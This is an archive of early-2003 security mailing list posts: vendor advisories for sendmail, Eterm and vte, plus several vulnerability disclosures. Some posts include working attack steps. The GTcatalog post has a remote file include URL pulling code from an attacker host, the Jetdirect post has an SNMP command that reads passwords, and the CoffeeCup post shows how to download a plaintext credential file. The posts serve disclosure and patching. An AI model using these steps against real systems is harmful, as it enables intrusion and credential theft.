GLSA: eterm (200303-1)

[Daniel Ahlberg]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - -
GENTOO LINUX SECURITY ANNOUNCEMENT 200303-1
- - -

  PACKAGE : eterm
  SUMMARY : dangerous interception of escape sequences
 DATE : 2003-03-03 10:13 UTC
  EXPLOIT : remote
VERSIONS AFFECTED : 0.9.2
FIXED VERSION : 0.9.2
  CVE : CAN-2003-0021 CAN-2003-0068

- - -

- From advisory:

Many of the features supported by popular terminal emulator software 
can be abused when un-trusted data is displayed on the screen. The 
impact of this abuse can range from annoying screen garbage to a 
complete system compromise. All of the issues below are actually 
documented features, anyone who takes the time to read over the man 
pages or source code could use them to carry out an attack.

Read the full advisory at:
http://marc.theaimsgroup.com/?l=bugtraqm=104612710031920w=2 

SOLUTION

It is recommended that all Gentoo Linux users who are running
x11-terms/eterm upgrade to eterm-0.9.2-r3 as follows:

emerge sync
emerge -u eterm
emerge clean

- - -
[EMAIL PROTECTED] - GnuPG key is available at http://cvs.gentoo.org/~aliz
- - -
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQE+YyrSfT7nyhUpoZMRAmQMAJ9l+LP0d7ZiiU/ORWsHe8dfbizcygCfRRaY
0qutlqN466gl7gkPydYcc6c=
=W8wR
-END PGP SIGNATURE-

GLSA: vte (200303-2)

[Daniel Ahlberg]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - -
GENTOO LINUX SECURITY ANNOUNCEMENT 200303-2
- - -

  PACKAGE : vte
  SUMMARY : dangerous interception of escape sequences
 DATE : 2003-03-03 10:16 UTC
  EXPLOIT : remote
VERSIONS AFFECTED : 0.10.25
FIXED VERSION : 0.10.25
  CVE : CAN-2003-0070

- - -

- From advisory:

Many of the features supported by popular terminal emulator software 
can be abused when un-trusted data is displayed on the screen. The 
impact of this abuse can range from annoying screen garbage to a 
complete system compromise. All of the issues below are actually 
documented features, anyone who takes the time to read over the man 
pages or source code could use them to carry out an attack.

Read the full advisory at:
http://marc.theaimsgroup.com/?l=bugtraqm=104612710031920w=2 

SOLUTION

It is recommended that all Gentoo Linux users who are running
x11-libs/vte upgrade to vte-0.10.25 as follows:

emerge sync
emerge -u vte
emerge clean

- - -
[EMAIL PROTECTED] - GnuPG key is available at http://cvs.gentoo.org/~aliz
- - -
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQE+YytrfT7nyhUpoZMRAmM4AJ9GiRX6v2zDkr0hftZ5hWc0rP8FtwCfWjsM
sM4EOkJZrokHlfOWLABLBgo=
=+/3p
-END PGP SIGNATURE-

Re: Netscape Communicator 4.x sensitive informations in configurationfile

[MightyE]

Although keeping the password plaintext in a configuration file isn't 
the best way to handle a password that software needs to remember, I do 
however want to point out that in order for programs to remember your 
password, they *must* store the password in some sort of reverseable 
obfuscation, meaning that once the obfuscation algorithm is known, the 
password is no more secure no matter how obfuscated it gets, as the 
software must at some point in time return it to a plaintext form in 
order to make use of it.

Obfuscating stored passwords only provides a minimal level of additional 
protection.  If you are using a system where someone has access to your 
configuration files (example: public computer lab in a library or 
college campus), then do *not* store your password on that machine.  If 
someone has the same access to that machine as you do, consider any 
information you store on it to be publicly available, and take 
appropriate precautions for sensitive information.

-MightyE

Neil Dickey wrote:

Marc Ruef [EMAIL PROTECTED] wrote:

 

The following paste shows the IMAP mail part of this configuration file.
You can see that the line 17 shows the unencrypted password
(MyPassword4).
[ ... Snip ... ]

user_pref(mail.imap.server.imap.computec.ch.password, MyPassword4);
user_pref(mail.imap.server.imap.computec.ch.remember_password, true);
   

I notice from the line immediately following that you have the package
remember your password.  It's been my understanding that doing so is
bad practice because that's just the sort of thing that someone probing
your system would very likely be looking for.  Certainly if you save
your password only in your head, then whether or not the program stores
it in the clear is a moot question.  ;-)
Best regards,

Neil Dickey, Ph.D.
Research Associate/Sysop
Geology Department
Northern Illinois University
DeKalb, Illinois
60115
 




smime.p7s
Description: S/MIME Cryptographic Signature

Implementation flaws in Adobe Document Server for Reader Extensions

[info]

Summary
===

Free Adobe Acrobat Reader (version 5.1 or later) has ability to: add notes and
attachments, add and check digital signatures, save forms locally, fill them
out online, distribute to others for review and commenting, and submit forms
via e-mail or the Web directly from within Acrobat Reader. But actions listed
above available for rights-enabled documents only (i.e. documents processed
by Adobe Document Server for Reader Extensions). Improper usage of cryptography
in server software allows anyone to produce reader-enabled documents without
Document Server for Reader Extensions. 

Contact information
===

Name   : ElcomSoft Co.Ltd.
E-mail : [EMAIL PROTECTED]
Fax: +1 866 448-2703 (US/Canada, toll-free)

The problem has been reported to vendor (Adobe Systems Inc) on
02/24/2003; vendor has not replied.

Technical info
===

Adobe Document Server for Reader Extensions
---

With this server, customers can assign custom usage rights to specific Adobe
Portable Document Format (PDF) forms and documents, so Acrobat Reader 5.1 users
can get access to additional features while working with the document. The
server can enable four types of usage rights on a PDF form:

- Commenting tools, including sticky notes, highlights, stamps, and
  strikethroughs;
- The ability to save a form to a desktop for offline completion or archiving,
  without loosing any forms data;
- Digital signatures, including support for Public Key Infrastructure systems
  for third-party validation (VeriSign, Entrust, and others);
- Advanced form features, including the ability to submit a form offline or via
  email, import or export forms data and attached files.

Description of Adobe Document Server for Reader Extensions features is
available at http://www.adobe.com/products/server/readerextensions/main.html.

The implementation of Document Server for Reader Extensions does not seem to be
very complicated. The Server just gets the PDF file (to be reader-enabled)
together with the list of enabling options, and produces new document that
contains one additional dictionary - actually, simply by adding an additional
block of data.

Note: for details of PDF structure, see Portable Document Format Specification
http://partners.adobe.com/asn/developer/acrosdk/docs/filefmtspecs/PDFReference.pdf

New dictionary is named ViewerPreferences and resides within document's
Root dictionary. For now, only one element is placed inside
ViewerPreferences dictionary - Rights Dictionary. Content of the Rights
Dictionary can be described as follows (key name, type and description):

Version (number): A number specifying the version of Rights dictionary.
Currently only version 1 is supported.

Document (array of names): List of flags related to Document operations.
Currently only one flag is supported: FullSave.

Form (array of names): List of flags related to Form processing. Supported
flags: Import, Export, SubmitStandalone, SpawnTemplate.

Annots (array of names): List of flags related to Annotations. Supported
flags: Create, Delete, Modify, Copy, Import, Export.

Signature (array of names): List of flags related to Digital Signature
handling. Currently only one flag is supported: Modify.

Msg (text string): Arbitrary string to be displayed in Instructions box
when reader-enabled document is opened in Acrobat Reader 5.1.

TimeOfUbiquitization (date): The date and time when document was processed
by Document Server for Reader Extensions.

RightsID or ADBE_RightsID (array): List of RSA-based digital signatures
for checking integrity of reader-enabling attributes.

Most elements listed in the table above are self-descriptive. Name of the last
key could be either RightsID or ADBE_RightsID - they are equivalent in Reader
5.1. Values in RightsID (or ADBE_RightsID) array are 512-bit RSA-encrypted
values, and could be decrypted with RSA Public Key, which is hard-coded (in
encrypted form) within Reader 5.1 executable. Those values are used as digital
signatures of some critical document parts to make sure that document was
reader-enabled with Adobe Document Server for Reader Extensions.

Sample form with additional usage rights could be downloaded from
http://www.adobe.com/products/server/readerextensions/pdfs/sample_docserver_readerext.pdf

According to press release from October 21, 2002, available at
http://www.adobe.com/aboutadobe/pressroom/pressreleases/pdfs/200210/20021021Ubiquity.pdf,
pricing of Adobe Document Server for Reader Extensions starts at US$75,000.

Adobe Acrobat Reader
---

Adobe Acrobat Reader is the most popular part of Adobe Acrobat product family.
Acrobat Reader is 

New HP Jetdirect SNMP password vulnerability when using Web JetAdmin

[Sven Pechler]

Hello,

During an analysis of some HP Jetdirect cards I discovered a security 
issue that could lead to full access to a networked printer. 

It looks like the vulnerability described in 
http://www.securityfocus.com/bid/5331, but the OID is different and you 
can only obtain one specific password.  
It is also different from the password vulnerability described in 
http://www.securityfocus.com/bid/3132


It applies to the following situation:

- Any operating system

-HP Jetdirect cards JetDirect 300X, (J3263A), JetDirect EX Plus (J2591A), 
JetDirect 400N (J2552A, J2552B), JetDirect 600N (J3110A, J3111A, J3113A) 
and older.

-The Jetdirect card is being managed from HP Web Jetadmin.

-A Web Jetadmin device password had been set on the JetDirect card. 
(This password must be set from Web Jetadmin and has nothing to do with 
the Telnet password or the SNMP Set community name)

In the above situation the Web Jetadmin device password is readable as 
plain ASCII tekst from the JetDirect card using SNMP.


How to check your printers for this vulnerability:

Use an SNMP toolkit to read the following OID from your printer:
.iso.org.dod.internet.private.enterprises.hp.nm.system.net-peripheral.net-
printer.generalDeviceStatus.gdPasswords
(In numerical format: .1.3.6.1.4.1.11.2.3.9.1.1.13.0)

An example on a Windows machine, using SNMPUTIL from the Windows Resource 
kit:
C:\snmputil get 131.155.120.118 public .1.3.6.1.4.1.11.2.3.9.1.1.13.0
Variable = .iso.org.dod.internet.private.enterprises.11.2.3.9.1.1.13.0
Value= String 
0x410x420x430x440x550x560x3d0x310x300x380
x3b0x000x000x000x00 ..etc...

The resulting string reads in ASCII: ABCDEF=108;  
The Web Jetadmin device password is the word before the '=' sign, in this 
case: ABCDEF


How to protect your printer:

1.  Keep the Web Jetadmin device password EMPTY (don't do this on 
newer cards than the ones mentioned above)
2.  Define a 'Set community name'  instead

Additional means of protection (does not address the SNMP vulnerability):
3.  Define a telnet password (do not keep it empty)
4.  Create an 'allow list' from the Telnet console to restrict access 
from defined IP-addresses 



Sven Pechler
University of Technology Eindhoven
Faculty of Technology Management

Contact for Palm Computing

[Joel Maslak]

Does anyone know who is the security contact for Palm Computing (PalmOS)?

-- 
Joel Maslak

GTcatalog (PHP)

[Frog Man]

Informations :
°°
Version : 0.9
Website : http://www.geektweaked.com
Problem :
- Informations Disclosure (Admin Password)
- File Including


PHP Code/Location :
°°°
password.inc :
?
$globalpw = [PASSWORD];
?
index.php :

[...]
switch ($function)
{
case custom:

$cc = new Template();
$cc-set_file(head,$dir_base.$dir_template.header.inc);
$cc-set_var(array(  'clientcode' = 
$cfg_clientcode,
'title' = $cfg_title. - 
.$custom));
$cc-parse(output,head);
$cc-p(output);
include($custom..custom.inc);
include ($dir_base.$dir_template.footer.inc);
break;
[...]

Exploits :
°°
- http://[target]/password.inc
- http://[target]/index.php?function=customcustom=http://[attacker]/1
with :
http://[attacker]/1.custom.inc
Patch :
°°°
A patch can be found on http://www.phpsecure.info (- New Version !! :))
More Details :
°°
In French :
http://www.frog-man.org/tutos/GTcatalog.txt
[EMAIL PROTECTED]



_
MSN Messenger : discutez en direct avec vos amis !  
http://messenger.fr.msn.be

Mail Header Buffer Overflow In Sendmail

[SGI Security Coordinator]

-BEGIN PGP SIGNED MESSAGE-

__
  SGI Security Advisory


Title: Mail Header Buffer Overflow In Sendmail
Number   : 20030301-01-P
Date : March 3, 2003
Reference: CERT VU#398025
Reference: CERT CA-2003-07
Reference: CVE CAN-2002-1337
Reference: SGI BUG 869098 875386 880975

Fixed in : IRIX 6.5.20 or patches 4975 and 4976
__

- ---
- --- Issue Specifics ---
- ---

ISS and sendmail.org have reported that there is a vulnerability involving
mail header manipulation that can result in a remote user gaining
root access to a system receiving mail through sendmail.

http://www.sendmail.org/8.12.8.html
http://www.cert.org/advisories/CA-2003-07.html
http://www.kb.cert.org/vuls/id/398025
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1337

SGI has investigated the issue and recommends the following steps for
neutralizing the exposure.  It is HIGHLY RECOMMENDED that these measures be
implemented on ALL vulnerable SGI systems.

These issues have been corrected with patches and in future releases of
IRIX.


- --
- --- Impact ---
- --

The sendmail binary is installed by default on IRIX 6.5 systems as part of
eoe.sw.base.

To determine the version of IRIX you are running, execute the following
command:

  # /bin/uname -R

That will return a result similar to the following:

  # 6.5 6.5.19f

The first number (6.5) is the release name, the second (6.5.16f in this
case) is the extended release name.  The extended release name is the
version we refer to throughout this document.


- 
- --- Temporary Workaround ---
- 

At this time, there is no effective workaround (other than disabling
sendmail) for these problems.  SGI recommends either upgrading to IRIX
6.5.20, or installing the appropriate patch from the listing below.


- 
- --- Solution ---
- 

SGI has provided a series of patches for these vulnerabilities. Our
recommendation is to upgrade to IRIX 6.5.20 when available, or install the
appropriate patch.

   OS Version Vulnerable? Patch #  Other Actions
   -- --- ---  -
   IRIX 3.xunknown Note 1
   IRIX 4.xunknown Note 1
   IRIX 5.xunknown Note 1
   IRIX 6.0.x  unknown Note 1
   IRIX 6.1unknown Note 1
   IRIX 6.2unknown Note 1
   IRIX 6.3unknown Note 1
   IRIX 6.4unknown Note 1
   IRIX 6.5  yes   Notes 2  3
   IRIX 6.5.1yes   Notes 2  3
   IRIX 6.5.2yes   Notes 2  3
   IRIX 6.5.3yes   Notes 2  3
   IRIX 6.5.4yes   Notes 2  3
   IRIX 6.5.5yes   Notes 2  3
   IRIX 6.5.6yes   Notes 2  3
   IRIX 6.5.7yes   Notes 2  3
   IRIX 6.5.8yes   Notes 2  3
   IRIX 6.5.9yes   Notes 2  3
   IRIX 6.5.10   yes   Notes 2  3
   IRIX 6.5.11   yes   Notes 2  3
   IRIX 6.5.12   yes   Notes 2  3
   IRIX 6.5.13   yes   Notes 2  3
   IRIX 6.5.14   yes   Notes 2  3
   IRIX 6.5.15   yes   4975Notes 2, 4  5
   IRIX 6.5.16   yes   4975Notes 2, 4  5
   IRIX 6.5.17   yes   4975Notes 2, 4  5
   IRIX 6.5.18   yes   4975Notes 2, 4  5
   IRIX 6.5.19   yes   4976Notes 2, 4  6
   IRIX 6.5.20no

   NOTES

 1) This version of the IRIX operating has been retired. Upgrade to an
actively supported IRIX operating system.  See
http://support.sgi.com/irix/news/index.html#policy for more
information.

 2) If you have not received an IRIX 6.5.X CD for IRIX 6.5, contact your
SGI Support Provider or URL: http://support.sgi.com/irix/swupdates/

 3) Upgrade to IRIX 6.5.20

 4) Install the patch

 5) This patch also fixes the smrsh issue discussed in SGI Security
Bulletin 20030101-01-P.

 6) This patch also fixes the relaying issue discussed in SGI Security
Bulletin 20030101-01-P.


- 
- --- Acknowledgments 
- 

SGI wishes to thank sendmail.org, ISS, CERT, and the users of the Internet
Community at large for their assistance in this matter.


# Patch File Checksums 

The actual patch will be a tar file containing 

Re: Terminal Emulator Security Issues

[Michael Jennings]

  Would stripping escape sequences from the window title work? Do you
  know of any applications that actually use this feature?
 
 ...snip...

 (Incidentally, I was unable to embed any such sequences in the
 title/icon name in 0.9.2 anyway...but I didn't try for very long, so
 I may have missed something.)

After further investigation, I'd like to point out the following:

Eterm has *never* allowed any control characters in its title/icon
name sequences.  The following bit of code has existed at least since
Eterm was first committed to CVS:

else if (ch  ' ')
return; /* control character - exit */

in term.c::process_xterm_seq(), line 1270 or so.

So there was never any way to get escape sequences in the title to
begin with, meaning that the command cannot be hidden using any
character attributes or background/foreground color matching.

Furthermore, the title which is printed via the \e[21t sequence is
limited to just under 1024 characters, which is not enough to cause
the command to scroll off the screen on any but the smallest of
terminals.

Thus, the following footnote from the original report applies to Eterm
as well:

[1] Although putty would place the title onto the command-line, we
were not able to find a method of hiding the command, since
neither the invisible character attribute nor the foreground
color could be set. Putty has a relatively low limit to the number
of characters that can be placed into the window title, so it is
not possible to simply flood the screen with garbage and hope the
command rolls past the current view.

Having said all that, it would seem that Eterm 0.9.2 is not vulnerable
to ANY of the issues mentioned in this report.  As such, all
distributions shipping older versions of Eterm should be safe after
upgrading to 0.9.2.  To that end, Eterm source and RPM packages are
available for download at http://www.eterm.org/download/ for any
vendor/user with 0.9.1 or earlier.

Hope that clears everything up. :-)

Regards,
Michael

-- 
Michael Jennings (a.k.a. KainX)  http://www.kainx.org/  [EMAIL PROTECTED]
n + 1, Inc., http://www.nplus1.net/   Author, Eterm (www.eterm.org)
---
 By the time they had diminished from 50 to 8, the other dwarves 
  began to suspect 'Hungry' ...-- Gary Larson, The Far Side

Re: sendmail 8.12.8 available

[Florian Weimer]

Claus Assmann [EMAIL PROTECTED] writes:

 Sendmail, Inc., and the Sendmail Consortium announce the availability
 of sendmail 8.12.8.  It contains a fix for a critical security
 problem discovered by Mark Dowd of ISS X-Force; we thank ISS X-Force
 for bringing this problem to our attention.  Sendmail urges all users to
 either upgrade to sendmail 8.12.8 or apply the patch for 8.12 that
 is part of this announcement.

Would people be willing to share filter rules for other MTAs to block
offending messages on relays?

Thanks,
-- 
Florian Weimer[EMAIL PROTECTED]
University of Stuttgart   http://CERT.Uni-Stuttgart.DE/people/fw/
RUS-CERT  fax +49-711-685-5898

Sendmail buffer overflow vulnerability in AIX.

[Shiva Persaud]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

IBM SECURITY ADVISORY

First Issued: Fri Feb 21 11:00:00 CST 2003

===
   VULNERABILITY SUMMARY

VULNERABILITY:  sendmail buffer overflow vulnerability.

PLATFORMS:  AIX 4.3, 5.1 and 5.2

SOLUTION:   Apply the workaround, efix or APARs as described below.

THREAT: A remote attacker can exploit a buffer overflow to
gain root privileges.

CERT VU Number: 398025
CVE Number: n/a
===
   DETAILED INFORMATION


I.  Description
===

Sendmail is a MTA (mail transfer agent) that routes mail for local or
network delivery. When sendmail receives a message it translates the
format of message headers to match the requirements of the destination
system. The program determines the destination via the syntax and content
of the address field in a message header. A vulnerability that exploits
how message headers are parsed has been found. This vulnerability allows
a remote attacker to gain root privileges. At this time, there is no known
exploit in the wild for this vulnerability.

The sendmail daemon runs on all versions of AIX by default. To determine
if sendmail is running on your system execute the following:

#lssrc -s sendmail

If sendmail is running, the following will be displayed:

Subsystem GroupPID Status
 sendmail mail active

Where  is the pid of the sendmail process on your system.

If sendmail is not installed, the system is not vulnerable.


II. Impact
==

A remote attacker can gain root privileges.


III.  Solutions
===

A. Official Fix
IBM provides the following fixes:

  APAR number for AIX 4.3.3: IY40500 (available approx. 03/12/2003)
  APAR number for AIX 5.1.0: IY40501 (available approx. 04/28/2003)
  APAR number for AIX 5.2.0: IY40502 (available approx. 04/28/2003)

NOTE: Fixes will not be provided for versions prior to 4.3 as
these are no longer supported by IBM. Affected customers are
urged to upgrade to 4.3.3 or 5.1.0 at the latest maintenance level.

B. E-fix
Temporary fixes for AIX 4.3.3, 5.1.0, and 5.2.0 systems are available.

The temporary fixes can be downloaded via ftp from:

 ftp://aix.software.ibm.com/aix/efixes/security/sendmail_efix.tar.Z

The efix compressed tarball contains three fixes: one each for
AIX 4.3.3, AIX 5.1.0 and AIX 5.2.0. It also includes this Advisory
and a README file with installation instructions.

Verify you have retrieved this efix intact:
- - -
There are 3 fix-files in this package for the 4.3.3, 5.1.0, 5.2.0
releases. The checksums below were generated using the sum and
md5 commands and are as follows:

Filename   summd5
=
sendmail.433   61331   428013f747e5a447e2dec777e2e840914a9
sendmail.510   34257  10595f282fd2a472c2d75c88c3c652312842
sendmail.520   45494  100788bcb028aab4625abe0257d3537a0813

These sums should match exactly; if they do not, double check the
command results and the download site address. If those are OK,
contact IBM AIX Security at [EMAIL PROTECTED] and describe
the discrepancy.

IMPORTANT: Create a mksysb backup of the system and verify it is
both bootable, and readable before proceeding.

These temporary fixes have not been fully regression tested; thus,
IBM does not warrant the fully correct functioning of the efix.
Customers install the efix and operate the modified version of AIX
at their own risk.

Efix Installation Instructions:
- - -
Detailed installation instructions can be found in the README file
supplied in the efix package. These instructions are summarized below.

You need to have the following filesets installed. This ensures that
the proper versions of co-requisite system files, such as libc.a, are
installed:

For AIX 4.3.3:
bos.net.tcp.client.4.3.3.87

For AIX 5.1.0:
bos.net.tcp.client.5.1.0.38

For AIX 5.2.0:
bos.net.tcp.client.5.2.0.1

You can determine which fileset is installed by executing
the following:

   # lslpp -L bos.net.tcp.client


1. Create a temporary efix directory and move to that directory.
   # mkdir /tmp/efix
   # cd /tmp/efix

2. Move the efix to /tmp/efix, uncompress it and un-tar the resulting
   tarfile. Move to the fix directory.
   # cp PATH_TO_ADVISORY /tmp/efix # where PATH_TO_ADVISORY is the fully
   # qualified path to the efix package.
   # uncompress sendmail_efix.tar.Z
   # tar xvf sendmail_efix.tar
   # cd sendmail_efix

3. Rename the patched binary files appropriate for your system and set
   ownership and permissions.
   # mv sendmail.xxx sendmail  # where xxx is 433, 510 or 520
   # 

sendmail 8.12.8 available

[Claus Assmann]

-BEGIN PGP SIGNED MESSAGE-

Sendmail, Inc., and the Sendmail Consortium announce the availability
of sendmail 8.12.8.  It contains a fix for a critical security
problem discovered by Mark Dowd of ISS X-Force; we thank ISS X-Force
for bringing this problem to our attention.  Sendmail urges all users to
either upgrade to sendmail 8.12.8 or apply the patch for 8.12 that
is part of this announcement.  Patches for older versions can be
downloaded from ftp.sendmail.org, see http://www.sendmail.org/ for
details.  Remember to check the PGP signatures of patches or releases
obtained.  For those not running the open source version, check
with your vendor for a patch.  There is a bug fix for ident parsing
in 8.12.8.  While this is not believed to be exploitable, if you
are not upgrading to 8.12.8, you may want to turn off ident checking
by adding this to your .mc file:

define(`confTO_IDENT', `0s')


For a complete list of changes see the release notes down below.

Please send bug reports to [EMAIL PROTECTED] as usual.

Note: We have changed the way we digitally sign the source code
distributions to simplify verification: in contrast to earlier
versions two .sig files are provided, one each for the gzip'ed
version and the compressed version. That is, instead of signing the
tar file, we sign the compressed/gzip'ed files, so you do not need
to uncompress the file before checking the signature.

This version can be found at

ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.8.tar.gz
ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.8.tar.gz.sig
ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.8.tar.Z
ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.8.tar.Z.sig

and the usual mirror sites.

MD5 signatures:

71b4ce8276536b82d4acdf6ec8be306a sendmail.8.12.8.tar.gz
2ecf7890c2ff5035aed8d342473d85a5 sendmail.8.12.8.tar.gz.sig
b06953b5fd11f9cd63b1eb89625ad881 sendmail.8.12.8.tar.Z
b505fc5b36fbba5b3af2afecb4d587b3 sendmail.8.12.8.tar.Z.sig

You either need the first two files or the third and fourth, i.e.,
the gzip'ed version or the compressed version and the corresponding
.sig file.  The PGP signature was created using the Sendmail Signing
Key/2003, available on the web site (http://www.sendmail.org/) or
on the public key servers.

Since sendmail 8.11 and later includes hooks to cryptography, the
following information from OpenSSL applies to sendmail as well.

   PLEASE REMEMBER THAT EXPORT/IMPORT AND/OR USE OF STRONG CRYPTOGRAPHY
   SOFTWARE, PROVIDING CRYPTOGRAPHY HOOKS OR EVEN JUST COMMUNICATING
   TECHNICAL DETAILS ABOUT CRYPTOGRAPHY SOFTWARE IS ILLEGAL IN SOME
   PARTS OF THE WORLD.  SO, WHEN YOU IMPORT THIS PACKAGE TO YOUR
   COUNTRY, RE-DISTRIBUTE IT FROM THERE OR EVEN JUST EMAIL TECHNICAL
   SUGGESTIONS OR EVEN SOURCE PATCHES TO THE AUTHOR OR OTHER PEOPLE
   YOU ARE STRONGLY ADVISED TO PAY CLOSE ATTENTION TO ANY EXPORT/IMPORT
   AND/OR USE LAWS WHICH APPLY TO YOU. THE AUTHORS ARE NOT LIABLE FOR
   ANY VIOLATIONS YOU MAKE HERE. SO BE CAREFUL, IT IS YOUR RESPONSIBILITY.

SENDMAIL RELEASE NOTES
  $Id: RELEASE_NOTES,v 8.1340.2.113 2003/02/11 19:17:41 gshapiro Exp $


This listing shows the version of the sendmail binary, the version
of the sendmail configuration files, the date of release, and a
summary of the changes in that release.

8.12.8/8.12.8   2003/02/11
SECURITY: Fix a remote buffer overflow in header parsing by
dropping sender and recipient header comments if the
comments are too long.  Problem noted by Mark Dowd
of ISS X-Force.
Fix a potential non-exploitable buffer overflow in parsing the
.cf queue settings and potential buffer underflow in
parsing ident responses.  Problem noted by Yichen Xie of
Stanford University Compilation Group.
Fix ETRN #queuegroup command: actually start a queue run for
the selected queue group.  Problem noted by Jos Vos.
If MaxMimeHeaderLength is set and a malformed MIME header is fixed,
log the fixup as Fixed MIME header instead of Truncated
MIME header.  Problem noted by Ian J Hart.
CONFIG: Fix regression bug in proto.m4 that caused a bogus
error message: FEATURE() should be before MAILER().
MAIL.LOCAL: Be more explicit in some error cases, i.e., whether
a mailbox has more than one link or whether it is not
a regular file.  Patch from John Beck of Sun Microsystems.


Instructions to extract and apply patch for sendmail 8.12:

The data below is a uuencoded, gzip'ed tar file.  Store the data
between = begin patch  and = end patch
== into a file called patch.sm and apply the following
command:

uudecode -p  patch.sm | gunzip -c | tar -xf -

This will give you two files:

sendmail.8.12.security.cr.patch
sendmail.8.12.security.cr.patch.sig

Check the integrity of the patch file using 

Cobalt RaQ server appliances

[Florian Effenberger]

Hi,

does anybody know a security contact at Sun, especially for the Cobalt RaQ
server appliances?

Thanks,
Florian

RE: Terminal Emulator Security Issues

[Kenn Humborg]

 After further investigation, I'd like to point out the following:
 
 Eterm has *never* allowed any control characters in its title/icon
 name sequences.  The following bit of code has existed at least since
 Eterm was first committed to CVS:
 
 else if (ch  ' ')
 return; /* control character - exit */
 
 in term.c::process_xterm_seq(), line 1270 or so.
 
 So there was never any way to get escape sequences in the title to
 begin with, meaning that the command cannot be hidden using any
 character attributes or background/foreground color matching.

What about the CSI character, code 155 (128+27), which DEC terminals
(from at least vt220) interpret as a shorthand for ESC [?

   http://vt100.net/docs/vt220-rm/chapter2.html#S2.5.2

Later,
Kenn

Re: Easy obtaining User+Pass+More on CoffeeCup Password Wizard All Versions

[Per-Ola Kristiansson]

The Java version is also vulnerable. The username, password and secret url
can be extracted from the param 0 in the html code. I wrote a small
program for this purpose a couple of months ago.

Password Wizard java sample: http://www.coffeecup.com/java-password/samples/

applet code=joylock.class width=342 height=140
param name=GENERATOR value=CREATED WITH THE APPLET PASSWORD WIZARD
WWW.COFFEECUP.COM
param name=GENERAL
value=1|11|004080|FF|wslzebajkcnrvogpquftxhidmyvttp://aaa.jnsseejrp.jny
/ywxxce.vtyc| |Login Complete.|Enter the Username and Password.| | |
param name=0
value=6|4|36|0|cftzmapuxnrsjibgwykqvleodhlfegvwcwlczccg://qqq.axbbwwahg.axe
/enyyvw.zcev
/applet

Best regards,
Per-Ola Kristiansson


- Original Message -
From: Rynho Zeros Web [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Saturday, March 01, 2003 12:42 AM
Subject: Easy obtaining User+Pass+More on CoffeeCup Password Wizard All
Versions


 + Topic: Easy obtaining User+Pass+More on CoffeeCup Password Wizard All
 Versions

 + Product: CoffeeCup Password Wizard All Versions

 + Vendor: CoffeeCup Software, Inc.

 + Site: http://www.coffeecup.com/java-password/

 + About CoffeeCup Password Wizard: Create unlimited password protected
pages

 with unlimited usernames and passwords with CoffeeCup Password Wizard.
 You don't even have to know Flash, Java, or HTML ! Customize the look and
 feel to match your page. You can even point different users to different
 URLs ! Preview within the program or your favorite browser. It's all that
 easy ! All this and more make CoffeeCup Password Wizard the easiest way
 to password protect your pages ! (¿?)

 + Description: Easy obtaining of names of users, passwords and a URL
  of direct access to the preferences of the same one.

 + Exploit:

 go to the login panel, see sourcecode HTML in search of the location
 of the file .swf used to make login.

 Example:

 Go to
 https://www.victim.com/billing/

 See sourcecode,

 [...]
 ID=billing WIDTH=146 HEIGHT=125
 PARAM NAME=movie VALUE=billing.swf
 PARAM NAME=quality VALUE=high
 [...]

 (https://www.victim.com/billing/billing.swf)

 the file of the passwords is called just as the file of login, but with
 the extension .apw

 now, go to  download the file:
 https://www.victim.com/billing/billing.apw (APW Is The COFFEECUP Password
 Wizard File)

 by I complete it opens east file with any text editor and found all the
 users
 with its passwords and the URL of direct access to its options.

 Example of passwords file:

 - billing.apw ---

 COFFEECUP PASSWORD WIZARD FILE
 WWW.COFFEECUP.COM
 PLEASE DO NOT EDIT

 MOVIE WIDTH:120
 MOVIE HEIGHT:100
 MOVIE FRAME RATE:0
 MOVIE BK COLOR:$00ECECEC
 MOVIE DEFAULT URL:
 MOVIE DEFAULT FRAME:
 MOVIE SWF NAME:billing.swf
 MOVIE SWF PATH:C:\Documents and Settings\vhost\Mis documentos\Mis
 Webs\victim.com\new website project\billing\
 MOVIE FONT NAME:MS Sans Serif
 MOVIE FONT SIZE:8
 MOVIE FONT COLOR:clBlack
 MOVIE TRANSPARENT TRUE
 MOVIE VERTICAL TRUE

 USER BOX LEFT:2
 USER BOX TOP:1
 USER BOX WIDTH:116
 USER BOX HEIGHT:34
 USER BOX CAPTION:Username

 PASS BOX LEFT:2
 PASS BOX TOP:36
 PASS BOX WIDTH:116
 PASS BOX HEIGHT:34
 PASS BOX CAPTION:Password

 BUTTON LEFT:15
 BUTTON TOP:78
 BUTTON WIDTH:90
 BUTTON HEIGHT:20
 BUTTON PATH:
 BUTTON TX:1
 BUTTON TY:1

 ADD USER:0anyweb xnet0305 https://www.victim.com/billing/anyweb0001.htm
 ADD USER:0anysite xnet2904 https://www.victim.com/billing/anysite0002.htm
 [...]
 END

 - billing.apw ---

 Example of user  pass on billing:

 user: anyweb
 pass: xnet0305
 url option panel: https://www.victim.com/billing/anyweb0001.htm


 

 [EOF]

 ---
 Credits: ToOcOoL (http://www.valenciahack.com/)
 ---

 
 Note: sorry by my bad english ;)
 

 --
 XyBØrG
 WebMaster de:
 www.RZWEB.com.ar
 Powered By Dattatec.Com

 +++ GMX - Mail, Messaging  more  http://www.gmx.net +++
 Bitte lächeln! Fotogalerie online mit GMX ohne eigene Homepage!



passwiz.c
Description: Binary data

[SCSA-008] Cross Site Scripting Script Injection Vulnerability in PY-Livredor

[Grégory]

Security Corporation Security Advisory [SCSA-008]


PROGRAM: PY-Livredor
HOMEPAGE: http://www.py-scripts.com
   http://www.scripts-php.com
VULNERABLE VERSIONS: v1.0


DESCRIPTION


PY-Livredor is an easy guestbook script using Php4 and MySql with
an administration which allow messages deletion.


DETAILS


A Cross-Site Scripting vulnerability have been found in PY-Livredor
which allow attackers to inject script codes into the guestbook and use
them on clients browser as if they were provided by the website.

This Cross-Site Scripting vulnerability are found in the page for
posting messages (index.php)

An attacker can input specially crafted links and/or other
malicious scripts.


EXPLOIT


A vulnerability was discovered in the page for posting messages,
